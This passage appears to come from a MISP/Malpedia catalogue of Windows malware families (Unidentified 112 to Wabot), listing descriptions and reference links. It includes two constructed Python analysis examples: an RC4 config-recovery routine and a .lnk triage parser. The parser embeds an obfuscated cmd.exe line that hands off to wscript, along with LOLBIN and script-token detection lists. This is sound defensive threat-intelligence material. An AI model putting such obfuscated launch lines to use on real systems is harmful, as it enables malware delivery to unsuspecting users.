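Added example; not code from Malpedia, TYPEFRAME or BLACKWIDOW/Latrodectus.
The key, field layout and sample data are constructed for illustration.
"""
from __future__ import annotations


def rc4_ksa(key: bytes) -> list[int]:
    """Key-scheduling algorithm: derive the initial 256-byte state from the key."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) & 0xFF
        state[i], state[j] = state[j], state[i]
    return state


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (RC4 is symmetric) by XORing data with the PRGA keystream."""
    state = rc4_ksa(key)
    i = j = 0
    out = bytearray(len(data))
    for n, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + state[i]) & 0xFF
        state[i], state[j] = state[j], state[i]
        out[n] = byte ^ state[(state[i] + state[j]) & 0xFF]
    return bytes(out)


def plaintext_score(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII, whitespace or a NUL field separator.

    A correct key turns a random-looking blob into mostly text, so a high score
    is a cheap way to tell a right key from a wrong one.
    """
    if not data:
        return 0.0
    good = sum(1 for b in data if 0x20 <= b < 0x7F or b in (0x00, 0x09, 0x0A, 0x0D))
    return good / len(data)


def parse_config(plaintext: bytes) -> list[str]:
    """Split a NUL-separated configuration (constructed layout) into string fields."""
    return [f.decode("ascii", errors="replace") for f in plaintext.split(b"\x00") if f]


def recover_config(
    blob: bytes, candidate_keys: list[bytes], threshold: float = 0.95
) -> tuple[bytes, list[str]] | None:
    """Try each candidate key; return (key, fields) for the first text-like result.

    Returns None if no candidate produces output above the plausibility threshold.
    """
    for key in candidate_keys:
        plain = rc4_crypt(key, blob)
        if plaintext_score(plain) >= threshold:
            return key, parse_config(plain)
    return None


# Constructed sample: a fake config encrypted with a fake key so the example
# runs offline. Nothing here is taken from a real sample.
SAMPLE_KEY = b"constructed-key-1"
SAMPLE_CONFIG = b"c2.example.invalid\x00443\x00campaign-01\x00"
SAMPLE_BLOB = rc4_crypt(SAMPLE_KEY, SAMPLE_CONFIG)
CANDIDATE_KEYS = [b"wrong-key", b"another-guess", SAMPLE_KEY]

if __name__ == "__main__":
    # prints (b'constructed-key-1', ['c2.example.invalid', '443', 'campaign-01'])
    print(recover_config(SAMPLE_BLOB, CANDIDATE_KEYS))
```

In practice the candidate keys come from the sample itself (a hard-coded string, a value derived from the campaign ID, or bytes read from the blob header), and the plausibility check should be adapted to the layout actually observed, for instance a known magic value or a length field, rather than a printable-byte ratio alone.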

Unidentified 112 (Rust-based Stealer)

A Rust-based stealer observed by Seqrite, with TTPs overlapping those of Pakistan-linked APT groups.

The tag is: misp-galaxy:malpedia="Unidentified 112 (Rust-based Stealer)"

Unidentified 112 (Rust-based Stealer) is also known as:

Table 4886. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_112

https://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/

Upatre

Upatre is primarily a downloader. It was discovered in 2013 and has been updated extensively since. Upatre delivers further malware to its victims; in particular, it was a prolific delivery mechanism for Gameover P2P in 2013-2014 and for Dyre in 2015.

The tag is: misp-galaxy:malpedia="Upatre"

Upatre is also known as:

Table 4889. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre

https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/

https://secrary.com/ReversingMalware/Upatre/

https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/

https://unit42.paloaltonetworks.com/ticked-off-upatre-malwares-simple-anti-analysis-trick-to-defeat-sandboxes/

https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/

Urausy

The tag is: misp-galaxy:malpedia="Urausy"

Urausy is also known as:

Table 4890. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy

Uroburos (Windows)

Uroburos is a driver for Windows, including a bypass of PatchGuard. According to Andrzej Dereszowski and Matthieu Kaczmarek, "the techniques used demonstrate [their] excellent knowledge of Windows kernel internals."

The tag is: misp-galaxy:malpedia="Uroburos (Windows)"

Uroburos (Windows) is also known as:

  • Snake

Table 4892. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos

https://exatrack.com/public/Tricephalic_Hellkeeper.pdf

https://securelist.com/analysis/publications/65545/the-epic-turla-operation/

https://artemonsecurity.com/uroburos.pdf

https://www.secureworks.com/research/threat-profiles/iron-hunter

https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/

https://exatrack.com/public/Uroburos_EN.pdf

https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf

https://www.circl.lu/pub/tr-25/

https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots

https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg

https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified

https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a

https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

https://artemonsecurity.com/snake_whitepaper.pdf

https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken

https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation

USBCulprit

According to Kaspersky, USBCulprit is a malware that is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

The tag is: misp-galaxy:malpedia="USBCulprit"

USBCulprit is also known as:

Table 4893. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit

https://securelist.com/cycldek-bridging-the-air-gap/97157/

https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view

https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf

Vadokrist

ESET reports that Vadokrist is a Latin American banking trojan that they have been tracking since 2018 and that is active almost exclusively in Brazil.

The tag is: misp-galaxy:malpedia="Vadokrist"

Vadokrist is also known as:

Table 4895. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist

https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf

https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/

vanillarat

VanillaRat is an advanced remote administration tool coded in C#. VanillaRat uses the Telepathy TCP networking library, dnlib module reading and writing library, and Costura.Fody dll embedding library. Features:

  • Remote Desktop Viewer (With remote click)

  • File Browser (Including downloading, drag and drop uploading, and file opening)

  • Process Manager

  • Computer Information

  • Hardware Usage Information (CPU usage, disk usage, available ram)

  • Message Box Sender

  • Text To Speech

  • Screen Locker

  • Live Keylogger (Also shows current window)

  • Website Opener

  • Application Permission Raiser (Normal -> Admin)

  • Clipboard Text (Copied text)

  • Chat (Does not allow for client to close form)

  • Audio Recorder (Microphone)

  • Process Killer (Task manager, etc.)

  • Remote Shell

  • Startup

  • Security Blacklist (Drag client into list if you don't want connection. Press del. key on client to remove from list)

The tag is: misp-galaxy:malpedia="vanillarat"

vanillarat is also known as:

Table 4899. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vanillarat

https://github.com/DannyTheSloth/VanillaRAT

VaporRage

According to Mandiant, VaporRage, or BOOMMIC, is a shellcode downloader written in C that communicates over HTTPS. Shellcode payloads are retrieved from a hardcoded C2 using an encoded host_id generated from the target's domain and account name. BOOMMIC XOR-decodes the downloaded shellcode payload in memory and executes it.

The tag is: misp-galaxy:malpedia="VaporRage"

VaporRage is also known as:

  • BOOMMIC

Table 4900. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage

https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf

https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58

https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns

Varenyky

In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.

The tag is: misp-galaxy:malpedia="Varenyky"

Varenyky is also known as:

Table 4901. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky

https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/

https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/

Veeam Dumper

Credential Stealer, written in .NET.

The tag is: misp-galaxy:malpedia="Veeam Dumper"

Veeam Dumper is also known as:

  • Eamfo

Table 4903. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.veeam

https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger

VEILEDSIGNAL

The tag is: misp-galaxy:malpedia="VEILEDSIGNAL"

VEILEDSIGNAL is also known as:

Table 4905. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.veiledsignal

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain

Velso

Ransomware that appears to require manual installation (believed to be via RDP). Encrypts files with the .velso extension.

The tag is: misp-galaxy:malpedia="Velso"

Velso is also known as:

Table 4906. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.velso

https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/

Vendetta

Ransomware, which appears to be a rebranding of win.cuba.

The tag is: misp-galaxy:malpedia="Vendetta"

Vendetta is also known as:

Table 4907. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vendetta

https://www.malwarebytes.com/blog/threat-intelligence/2023/03/ransomware-review-march-2023

VenomLNK

VenomLNK is the initial phase of the more_eggs malware-as-a-service. It is a poisoned .lnk file that depends on User Execution and points to LOLBINs (often cmd.exe) with additional obfuscated scripting options. This typically initiates WMI abuse and TerraLoader, which can load additional functionality through various plugins.
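One way to triage the kind of shortcut described above is to parse the .lnk StringData and flag a LOLBIN target whose arguments carry scripting or obfuscation tokens. The following is an added example, not code from eSentire, Malpedia or the more_eggs operators. It follows the MS-SHLLINK layout (76-byte header, optional LinkTargetIDList and LinkInfo blocks, then length-prefixed StringData); the shortcut bytes are built by build_lnk() as a constructed sample, and the command line it embeds is illustrative, not a real VenomLNK command line. The LOLBIN and token lists are assumptions chosen for the demonstration.

```python
"""Triage of a Windows Shell Link (.lnk): recover the target, working directory
and command-line arguments from the StringData section and flag shortcuts that
launch a LOLBIN with scripting options (the VenomLNK pattern).

Added example, not code from eSentire or the more_eggs / VenomLNK operators.
SAMPLE_LNK and BENIGN_LNK are constructed here; they are not real files.
"""
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1); IS_UNICODE selects UTF-16LE StringData.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 1 << 0, 1 << 1
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 1 << 2, 1 << 3, 1 << 4
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 5, 1 << 6, 1 << 7
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Assumed lists for the demonstration: LOLBINs worth flagging as a shortcut
# target, and argument tokens that hint at script hand-off or cmd.exe obfuscation.
LOLBINS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe")
SCRIPT_TOKENS = ("/c ", "/k ", "^", "%", "//e:", "wmic", "-enc", "http")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields present in the shortcut."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:               # fixed order per the spec
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # character count, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage(fields: dict) -> dict:
    """Flag a shortcut whose target is a LOLBIN and whose arguments carry
    scripting or obfuscation tokens."""
    target = (fields.get("relative_path") or "").lower()
    args = (fields.get("arguments") or "").lower()
    lolbin = next((b for b in LOLBINS if target.endswith(b)), None)
    tokens = [t for t in SCRIPT_TOKENS if t in args]
    return {"lolbin": lolbin, "tokens": tokens,
            "suspicious": lolbin is not None and bool(tokens)}


def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Constructed-sample builder: minimal Unicode shortcut with three strings."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ShowCommand = SW_SHOWNORMAL
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body


# Constructed VenomLNK-style sample: cmd.exe with a caret-obfuscated script hand-off.
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe", r"%TEMP%",
                       r"/c set w=ws^cript & %w% //e:jscript %TEMP%\resume.js")
BENIGN_LNK = build_lnk(r"..\Program Files\Notepad++\notepad++.exe",
                       r"C:\Program Files\Notepad++", "")

if __name__ == "__main__":
    for lnk in (SAMPLE_LNK, BENIGN_LNK):
        fields = parse_lnk(lnk)
        print(fields, triage(fields))
```

The relative path is only one of the places a target can live (LinkTargetIDList and LinkInfo carry it too), so a production triage script would also decode those blocks; the StringData fields are, however, where the arguments are, and that is what distinguishes a poisoned shortcut from a harmless one.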

The tag is: misp-galaxy:malpedia="VenomLNK"

VenomLNK is also known as:

Table 4909. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk

https://www.esentire.com/web-native-pages/unmasking-venom-spider

https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware

https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9

https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/

https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire

Venus Locker

The tag is: misp-galaxy:malpedia="Venus Locker"

Venus Locker is also known as:

Table 4910. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker

https://twitter.com/JaromirHorejsi/status/813690129088937984

Vermilion Strike (Windows)

The tag is: misp-galaxy:malpedia="Vermilion Strike (Windows)"

Vermilion Strike (Windows) is also known as:

Table 4911. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike

https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/

Vetta Loader

Vetta Loader is a persistent loader spreading via infected USB drives. It downloads other components leveraging legitimate hosting services. https://yoroi.company/wp-content/uploads/2023/12/202311-Vetta-Loader_Def-min.pdf

The tag is: misp-galaxy:malpedia="Vetta Loader"

Vetta Loader is also known as:

Table 4913. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vetta_loader

https://yoroi.company/en/research/unveiling-vetta-loader-a-custom-loader-hitting-italy-and-spread-through-infected-usb-drives/

Vflooder

Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services is negligible, but for researchers it can be a nuisance. Most versions are protected by VMProtect.

The tag is: misp-galaxy:malpedia="Vflooder"

Vflooder is also known as:

Table 4914. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder

https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/

VictoryGate

VictoryGate was the name of a cryptomining botnet, which was disrupted by ESET researchers in April 2020. The malware used was also referred to as VictoryGate. It was spotted in May 2019 and targeted mainly Latin American users, specifically in Peru (Criptonizando states 90% of the botnet population resided there). Both public and private sectors were targeted. This cryptojacking malware was specialized in the Monero (XMR) cryptocurrency. VictoryGate shows very strong code overlap with win.orchard.

The tag is: misp-galaxy:malpedia="VictoryGate"

VictoryGate is also known as:

Table 4916. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate

https://criptonizando.com/35-mil-computadores-foram-infectados-na-america-latina-por-malware-que-minerava-monero/

https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/

https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam

https://www.eset.com/int/about/newsroom/press-releases/research/eset-researchers-disrupt-cryptomining-botnet-victorygate/

Vidar

Vidar is a forked malware based on Arkei. It appears to be one of the first stealers to grab information from 2FA software and the Tor Browser.

The tag is: misp-galaxy:malpedia="Vidar"

Vidar is also known as:

Table 4917. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif

https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed

https://community.emergingthreats.net/t/vidar-stealer-picks-up-steam/271

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html

https://www.youtube.com/watch?v=NI_Yw2t9zoo

https://www.secureworks.com/research/the-growing-threat-from-infostealers

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign

https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/

https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google

https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468

https://ke-la.com/information-stealers-a-new-landscape/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/

https://embee-research.ghost.io/ghidra-basics-identifying-and-decoding-encrypted-strings/

https://twitter.com/sisoma2/status/1409816282065743872

https://twitter.com/GroupIB_GIB/status/1570821174736850945

https://blog.jaalma.io/vidar-infostealer-analysis/

https://www.quorumcyber.com/wp-content/uploads/2023/01/Malware-Analysis-Vidar.pdf

https://xer0xe9.github.io/A-Case-of-Vidar-Infostealer-Part-2/

https://www.youtube.com/watch?v=lxdlNOaHJQA

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://cert.pl/en/posts/2021/10/vidar-campaign/

https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

https://asec.ahnlab.com/en/30445/

https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/

https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf

https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing

https://xer0xe9.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/

https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back

https://isc.sans.edu/diary/rss/28468

https://censys.com/tracking-vidar-infrastructure/

https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html

https://eln0ty.github.io/malware%20analysis/vidar/

https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html

https://asec.ahnlab.com/ko/25837/

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-vidar-2c0a62a73087

https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal

https://asec.ahnlab.com/en/22932/

https://socprime.com/blog/somnia-malware-detection-uac-0118-aka-frwl-launches-cyber-attacks-against-organizations-in-ukraine-using-enhanced-malware-strains/

https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure

https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper

https://kienmanowar.wordpress.com/2022/12/17/quicknote-vidarstealer-analysis/

https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-vidar-stealer

https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/

https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem

https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/

https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd

https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d

https://intel471.com/blog/privateloader-malware

https://threatpost.com/microsoft-help-files-vidar-malware/179078/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a

https://www.kroll.com/en/insights/publications/cyber/threat-actors-google-ads-deploy-vidar-stealer

https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks

https://asec.ahnlab.com/en/30875/

https://www.cynet.com/blog/cyops-lighthouse-vidar-stealer/

VIGILANT CLEANER

Wiper malware discovered by Japanese security firm Mitsui Bussan Secure Directions (MBSD), which is assumed to target Japan, the host country of the 2021 Summer Olympics. In addition to targeting common Office-related files, it specifically targets file types associated with the Japanese word processor Ichitaro.

The tag is: misp-galaxy:malpedia="VIGILANT CLEANER"

VIGILANT CLEANER is also known as:

  • VIGILANT CHECKER

Table 4918. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner

https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/

https://blog.trendmicro.co.jp/archives/28319

https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/

https://www.mbsd.jp/research/20210721/blog/

https://www.fortinet.com/blog/threat-research/wiper-malware-riding-tokyo-olympic-games

virdetdoor

The tag is: misp-galaxy:malpedia="virdetdoor"

virdetdoor is also known as:

Table 4919. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor

https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks

VIRTUALGATE

The tag is: misp-galaxy:malpedia="VIRTUALGATE"

VIRTUALGATE is also known as:

Table 4921. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.virtualgate

https://norfolkinfosec.com/some-notes-on-virtualgate/

Vjw0rm

VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).

The tag is: misp-galaxy:malpedia="Vjw0rm"

Vjw0rm is also known as:

Table 4924. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm

https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf

https://community.riskiq.com/article/24759ad2

https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

https://resources.securityscorecard.com/research/acasestudyofVjw0rm#page=1

https://twitter.com/tccontre18/status/1461386178528264204

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://bazaar.abuse.ch/browse/signature/Vjw0rm/

https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf

Vobfus

Malware of this family searches for computers on a network and creates copies of itself in folders with open access. For the program to be activated, the user must first run it on the computer. The code of this malware is written in the Visual Basic programming language and uses obfuscation, which is a distinguishing feature of this family. Code obfuscation complicates attempts by anti-virus software to analyze suspected malware.

The tag is: misp-galaxy:malpedia="Vobfus"

Vobfus is also known as:

  • Beebone

Table 4926. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus

https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/

http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions

Void

Ransomware.

The tag is: misp-galaxy:malpedia="Void"

Void is also known as:

  • VoidCrypt

Table 4928. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.void

https://securelist.com/cis-ransomware/104452/

https://id-ransomware.blogspot.com/2020/04/void-voidcrypt-ransomware.html

Vovalex

Ransomware written in D.

The tag is: misp-galaxy:malpedia="Vovalex"

Vovalex is also known as:

Table 4932. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vovalex

https://twitter.com/VK_Intel/status/1355196321964109824

https://twitter.com/malwrhunterteam/status/1351808079164276736

Vreikstadi

The tag is: misp-galaxy:malpedia="Vreikstadi"

Vreikstadi is also known as:

Table 4933. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi

https://twitter.com/malware_traffic/status/821483557990318080

Vulturi

Information stealer.

The tag is: misp-galaxy:malpedia="Vulturi"

Vulturi is also known as:

Table 4936. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vulturi

https://twitter.com/ViriBack/status/1430604948241276928?s=20

Vyveva RAT

Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.

It uses a simple XOR for encryption of its configuration and network traffic.

It sends detailed information about the victim’s environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.

It supports more than 20 commands that include operations on the victim’s filesystem, basic process management, command line execution, file exfiltration, and the download and in-memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from the Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. It can also monitor newly connected drives and the number of logged-on users.

It has MPRD.dll as the internal DLL name, and a single export SamIInitialize.

Vyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.

The tag is: misp-galaxy:malpedia="Vyveva RAT"

Vyveva RAT is also known as:

Table 4937. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva

https://www.welivesecurity.com/2021/04/08/are-you-afreight-dark-watch-out-vyveva-new-lazarus-backdoor/

w32times

The tag is: misp-galaxy:malpedia="w32times"

w32times is also known as:

Table 4938. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times

https://attack.mitre.org/wiki/Group/G0022

win.wabot

Wabot is an IRC worm that is written in Delphi.

The tag is: misp-galaxy:malpedia="win.wabot"

win.wabot is also known as:

Table 4939. Table References

Links

